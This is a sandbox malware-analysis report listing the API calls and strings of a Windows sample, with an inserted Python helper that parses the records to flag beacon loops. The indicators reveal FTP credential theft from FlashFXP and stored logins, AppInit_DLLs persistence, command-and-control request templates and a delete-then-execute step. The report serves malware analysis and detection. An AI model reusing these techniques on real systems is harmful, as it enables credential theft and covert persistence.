                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open$CloseQueryValue
                                                                                                                                                                                                                • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                                                                                                                                                                                                                • API String ID: 3546245721-1332223170
                                                                                                                                                                                                                • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                                • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
• SetParent.USER32(00000000,00000000), ref: 0040A1E2
• GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
• SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
• SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
  • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
  • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
  • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
• String ID: Shell_TrayWnd$eventConn
• API String ID: 2141107913-3455059086
• Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
• Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
• Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
• Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
APIs
  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
• HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
• StrStrIA.SHLWAPI(?,?), ref: 00404913
• StrStrIA.SHLWAPI(?,?), ref: 00404925
• StrStrIA.SHLWAPI(?,?), ref: 00404935
• StrStrIA.SHLWAPI(?,?), ref: 00404947
  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
• String ID: ftp://%S:%S@%S:%u$ftplist.txt
• API String ID: 1635188419-1322549247
• Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
• Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
• Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
• Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
APIs
• CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
• GetLocalTime.KERNEL32(?), ref: 00407387
• GetLocalTime.KERNEL32(?), ref: 0040738D
• GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
• SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
• SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
• SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
• CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
• String ID:
• API String ID: 3166187867-0
• Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
• Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
• Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
• Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID:
• String ID: http$+@
• API String ID: 0-4127549746
• Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
• Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
• Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
• Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
APIs
  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: EnvironmentExpandFolderOpenPathStrings
• String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
• API String ID: 1994525040-4055253781
• Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
• Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
• Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
• Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
APIs
• SysAllocString.OLEAUT32(?), ref: 004099EB
• SysAllocString.OLEAUT32(?), ref: 004099F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: AllocString
• String ID: </domain>$</url>$<domain>$<url>$http://
• API String ID: 2525500382-924421446
• Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
• Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
• Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
• Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
APIs
• SysFreeString.OLEAUT32(7644F6A0), ref: 00408F82
• SysFreeString.OLEAUT32(0000000B), ref: 00409046
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
• Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
• Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
• Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
APIs
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
• Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
• Sleep.KERNEL32(0000EA60), ref: 0040AD76
• Sleep.KERNEL32(00002710), ref: 0040ADA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Sleep$AttemptConnectInternet
• String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
• API String ID: 362191241-2593661552
• Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
• Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
• Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
• Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
APIs
• _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
• __FindPESection.LIBCMT ref: 0040D8AC
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: FindHandlersScopeSectionTableValidate
• String ID:
• API String ID: 876702719-0
• Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
• Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
• Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
• Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
APIs
• SysFreeString.OLEAUT32(?), ref: 004088E4
• SysFreeString.OLEAUT32(?), ref: 004088E9
• SysFreeString.OLEAUT32(?), ref: 004089D3
• SysFreeString.OLEAUT32(?), ref: 004089D8
• SysFreeString.OLEAUT32(?), ref: 004089F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: FreeString
• String ID: +@
• API String ID: 3341692771-3835504741
• Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
• Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
• Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
• Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
APIs
• Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
• Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
• Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
• GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
• HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
• String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
• API String ID: 3100629401-2436734164
• Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
• Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
• Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
• Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
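The two records above that pair Sleep with InternetAttemptConnect and a caret-delimited format string (job^rev=%s^os=%s and confirm^rev=%s^code=%s^param=%s^os=%s) describe a beacon loop: the plugin prints Sleep's dwMilliseconds argument in hex, so 00002710 is 10 000 ms and 0000EA60 is 60 000 ms, i.e. a ten-second wait, a one-minute wait when the connection attempt fails, and another ten seconds. The helper below is an added example, not Joe Sandbox or Neconyd code. It parses the APIs and String ID lines of such records (its input is an excerpt of this section, including the Sleep/DeleteFileW/CreateProcessW record that follows), converts each Sleep argument to seconds, splits every %s-bearing template into a command name and its field names, and applies two labels, beacon_loop and delete_and_execute, that are this example's own heuristics. Whether the template ends up in a URL or a request body is not visible in these records and is not assumed.

```python
"""Triage helper for Joe Sandbox function-analysis records (added example,
not Joe Sandbox code). Labels below are this example's own heuristics."""
import re
from dataclasses import dataclass, field

# Constructed input: the APIs / String ID lines of the three Sleep-bearing
# records in this section, copied from the report.
REPORT_EXCERPT = """\
APIs
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
• Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
• Sleep.KERNEL32(0000EA60), ref: 0040AD76
• Sleep.KERNEL32(00002710), ref: 0040ADA4
• String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
APIs
• Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
• Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
• Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
• GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
• HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
• String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
APIs
• Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
• DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
• Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
• _memset.LIBCMT ref: 004025DA
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
"""

# One "• Name.MODULE(args), ref: ADDR" line, with or without the subcall prefix.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

@dataclass
class Record:
    calls: list = field(default_factory=list)      # (name, module, [args], ref)
    templates: list = field(default_factory=list)  # ("job", ["rev", "os"])

    @property
    def names(self):
        return {name for name, _, _, _ in self.calls}

    @property
    def sleep_seconds(self):
        # Sleep()'s first argument is dwMilliseconds; the plugin prints it in hex.
        return [int(args[0], 16) / 1000 for name, _, args, _ in self.calls
                if name == "Sleep" and args and args[0] != "?"]

    def labels(self):
        out = []
        if {"Sleep", "InternetAttemptConnect"} <= self.names and self.templates:
            out.append("beacon_loop")       # wait, connect, format a request
        if {"DeleteFileW", "CreateProcessW"} <= self.names:
            out.append("delete_and_execute")
        return out

def parse_template(s):
    """'job^rev=%s^os=%s' -> ('job', ['rev', 'os']); None if not a template."""
    if "%s" not in s:
        return None
    head, *pairs = s.split("^")
    return head, [p.split("=", 1)[0] for p in pairs if "=" in p]

def parse_report(text):
    """Split the excerpt into records at each 'APIs' heading."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            records.append(Record())
        elif not records:
            continue
        elif line.startswith("• String ID:"):
            # The plugin joins a function's strings with '$'.
            for part in line.split(":", 1)[1].split("$"):
                t = parse_template(part.strip())
                if t:
                    records[-1].templates.append(t)
        elif (m := API_LINE.search(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            records[-1].calls.append((m["name"], m["module"], args, m["ref"]))
    return records

def summarize(text):
    """[(labels, total sleep seconds, command names), ...] per record."""
    return [(r.labels(), sum(r.sleep_seconds), [t[0] for t in r.templates])
            for r in parse_report(text)]

if __name__ == "__main__":
    for labels, secs, cmds in summarize(REPORT_EXCERPT):
        print(labels or ["other"], f"sleeps {secs:.0f}s total", cmds)
```

Run as-is it reports the first two records as beacon_loop with 80 s of sleeps each and the commands job and confirm, and the third as delete_and_execute with 70 s; pointing it at other records of the same report (or a whole exported page) needs only a different input string. The 70 to 80 seconds of Sleep per pass is the number to feed into a sandbox's sleep-skipping or timeout setting when re-running the sample.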
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • _memset.LIBCMT ref: 004025DA
                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
• String ID: none
• API String ID: 2353737338-2140143823
APIs
• SysFreeString.OLEAUT32(?), ref: 004094E6
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
APIs
• _memset.LIBCMT ref: 0040A26B
• SysAllocString.OLEAUT32(?), ref: 0040A28E
• SysAllocString.OLEAUT32(?), ref: 0040A296
• SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
• SysFreeString.OLEAUT32(?), ref: 0040A2CF
  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
  • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
  • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
  • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
Strings
Similarity
• API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
• String ID: J(@
• API String ID: 3143865713-2848800318
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
• GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
• CloseHandle.KERNEL32(00000000), ref: 00407880
• GetTickCount.KERNEL32 ref: 00407888
Strings
Similarity
• API ID: File$CloseCountCreateHandleModuleNameTickTime
• String ID: UniqueNum
• API String ID: 1853814767-3816303966
APIs
• SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
• ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
Strings
Similarity
• API ID: File$CreateModuleNamePointerRead
• String ID: UniqueNum$d$hOAd$x
• API String ID: 1528952607-1018652783
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
• GetLastError.KERNEL32(?,00000000), ref: 0040864A
  • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
  • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
• DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                                                                                                                                                                                                                • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                                                                                                                                                                                                                • API String ID: 4026185228-3265104503
                                                                                                                                                                                                                • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                                • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                                                                                                                                                                                                                APIs
